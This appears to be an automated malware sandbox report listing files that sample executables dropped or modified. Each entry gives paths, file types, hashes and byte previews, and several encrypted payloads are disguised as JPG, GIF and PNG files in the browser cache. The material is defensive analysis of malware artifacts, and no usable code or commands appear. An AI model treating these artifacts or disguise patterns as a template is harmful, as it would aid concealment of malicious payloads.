Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\W9sgnm2c\utils.vcxproj

Download File

Process:	C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.999399909868975
Encrypted:	true
SSDEEP:	6144:aiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:F8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	A334E590E5C50E408BB5817CA1FF20A0
SHA1:	40CEFCD965B6828838581E3391DBC60EA2F0719B
SHA-256:	1C9E3572F46C76853366B42D562B48F6619DC70769D22C7FE55BEE2CDEF3C0EA
SHA-512:	BA90559BE1279650D28B72111BA72104C0E005F42B98ECF3D734ADFD284E5698AD23BCDB1C322F0844D3E57269CBF52051B94F60B10294ED26603DDD7A90A470
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......}...............................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF8.217.35.192....."ijstuvwxyz....psffvt.net......3#..............35.192....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\Public\Music\destopbak.ini

Download File

Process:	C:\Users\user\Documents\qWXt7a.exe
File Type:	MIPSEB MIPS-III ECOFF executable
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:s:s
MD5:	7E74F75663E5B5A4F3452A4C603EE45D
SHA1:	D5114B086B721F2C87EA7152025792958AB4C629
SHA-256:	DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
SHA-512:	2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	.@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

Download File

Process:	C:\Users\user\Documents\qWXt7a.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	366410
Entropy (8bit):	7.375315637594966
Encrypted:	false
SSDEEP:	6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
MD5:	DA1D5EB665D3AAD523BE59415E6449ED
SHA1:	40C310E82035381410B83E4F1DA0A4410FEB8FE6
SHA-256:	F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
SHA-512:	6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3892010
Entropy (8bit):	7.995495589600101
Encrypted:	true
SSDEEP:	98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
MD5:	E4E46F3980A9D799B1BD7FC408F488A3
SHA1:	977461A1885C7216E787E5B1E0C752DC2067733A
SHA-256:	6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
SHA-512:	9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

Download File

Process:	C:\Users\user\Documents\qWXt7a.exe
File Type:	data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	4.5851931774575325
Encrypted:	false
SSDEEP:	6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
MD5:	E54C4296F011EC91D935AA353C936E34
SHA1:	53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
SHA-256:	81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
SHA-512:	5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
Malicious:	false
Preview:	.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.3493267001452045
Encrypted:	false
SSDEEP:	6:WMwfCv+Xa3bbn6EeCrCa2BIDRd3oV1SsYRhfd7OdUzW9E40/qcX:VwavnvpMBIDRBoV1XYRhBgUzWg3
MD5:	A1DCF4DAA9E8E5EDD6705AD2A497E3BB
SHA1:	54E66240A73EC92789338E3E58F0C68D9F173D25
SHA-256:	E36BA7E2A9900328489D8F0E494B07720A838390ECB28FF47FA627E570E576A9
SHA-512:	994AAD5587C17B72DC47695564789BCFAA6771071057C5B0AE031A35A71609D98AD7BE9415D9C37249308E4AEE24280A59E32B1B4E07CB4EE22BC5EF26DE54D1
Malicious:	false
Preview:	....l%00.CITe.z;HH.X6u:=TWTS4}2?VFJQ2".2]_.S}4:555555555555555555555555555555555]AAE6.jjY...?t a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33.@JWf-y8KK.[5v9>WTWP7~1<UEIR1!\|1^\.R\|5;444444444444444444444444444444444\@@D7~kkX...>u!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6\|ylllllllllllllllllllllllllllllllllllll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\FOM-51[1].jpg

Download File

Process:	C:\Users\user\Documents\qWXt7a.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	4859125
Entropy (8bit):	7.999956261017207
Encrypted:	true
SSDEEP:	98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
MD5:	EE6CA3EEA7F9B1C81059AEF570A28C02
SHA1:	14EFBF498356644D9B1327407E3F03E1BFBEA363
SHA-256:	A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
SHA-512:	563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\b[1].gif

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	125333
Entropy (8bit):	7.993522712936246
Encrypted:	true
SSDEEP:	3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
MD5:	2CA9F4AB0970AA58989D66D9458F8701
SHA1:	FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
SHA-256:	5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
SHA-512:	AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	8299
Entropy (8bit):	7.9354275320361545
Encrypted:	false
SSDEEP:	192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
MD5:	9BDB6A4AF681470B85A3D46AF5A4F2A7
SHA1:	D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
SHA-256:	5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
SHA-512:	5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE...............CHI........[..>G..C..&.!7..E..)U&.$...z.tuv......?..............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\FOM-52[1].jpg

Download File

Process:	C:\Users\user\Documents\qWXt7a.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5062442
Entropy (8bit):	7.999518892518095
Encrypted:	true
SSDEEP:	98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
MD5:	70C21DA900796B279A09040B00953E40
SHA1:	7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
SHA-256:	901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
SHA-512:	851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\c[1].gif

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10681
Entropy (8bit):	7.866148090449211
Encrypted:	false
SSDEEP:	192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
MD5:	10A818386411EE834D99AE6B7B68BE71
SHA1:	27644B42B02F00E772DCCB8D3E5C6976C4A02386
SHA-256:	7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
SHA-512:	BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\drops[1].jpg

Download File

Process:	C:\Users\user\Documents\qWXt7a.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	37274
Entropy (8bit):	7.991781062764932
Encrypted:	true
SSDEEP:	768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
MD5:	6D4DEB9526F3973DE0F9DCE9392F8EA7
SHA1:	520128FB9BAB7064BEA992E4427B924073E58C0E
SHA-256:	B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
SHA-512:	F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\FOM-50[1].jpg

Download File

Process:	C:\Users\user\Documents\qWXt7a.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	55085
Entropy (8bit):	7.99273647746538
Encrypted:	true
SSDEEP:	1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
MD5:	DC44AE348E6A74B3A74871020FDFAC74
SHA1:	B223020A5F82FF15FD5E4930477F38F34C9CB919
SHA-256:	48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
SHA-512:	5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~..a.....=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\a[1].gif

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	135589
Entropy (8bit):	7.995304392539578
Encrypted:	true
SSDEEP:	3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
MD5:	0DDD3F02B74B01D739C45956D8FD12B7
SHA1:	561836F6228E24180238DF9456707A2443C5795C
SHA-256:	2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
SHA-512:	0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\s[1].dat

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.711559025584087
Encrypted:	false
SSDEEP:	384:9OegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQB:V5F1FUdy422IK+gAZt2i0YPpQn4GMm
MD5:	A8ACB8CAFB008F7E2CBEA696ECFC8E3B
SHA1:	74B8820D66A9CCCF00F7EF6E50B61F2A9364D5E7
SHA-256:	EFDB523465B42E7F7D0765570EB6B82178E567C0305B20E79D33FF91262902E0
SHA-512:	EFC762018506C4671B66E3D35F2F821431FD82DCBFFFB9615DA0A1D5CDA0BD42CFA52FE209FFA8450BD6A51B09F2193BFF2818D71B34C83A9D2F6C4667CF0420
Malicious:	false
Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\Documents\MsMpList.dat

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3889557
Entropy (8bit):	7.999938758760535
Encrypted:	true
SSDEEP:	98304:PAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:IndLOZS/DtpPJRO8OHBL4f2UQI+A
MD5:	3A5FF0732B6641AEA9538C794E738960
SHA1:	624813FDF9B2E65C34AF5681D2CF38662187C67B
SHA-256:	FF418B525158D27136B6962B997A191DCE03F1ED415F852D46756E913821B9A5
SHA-512:	76CCDA6356C046AB449221358D6F63ECC996B705CEDE8ED957BF08287F5EDD7656A1AC82B52CDC3E574DE488DC51F98234BC594BAFA5E686E888EC16FEC5AEAE
Malicious:	false
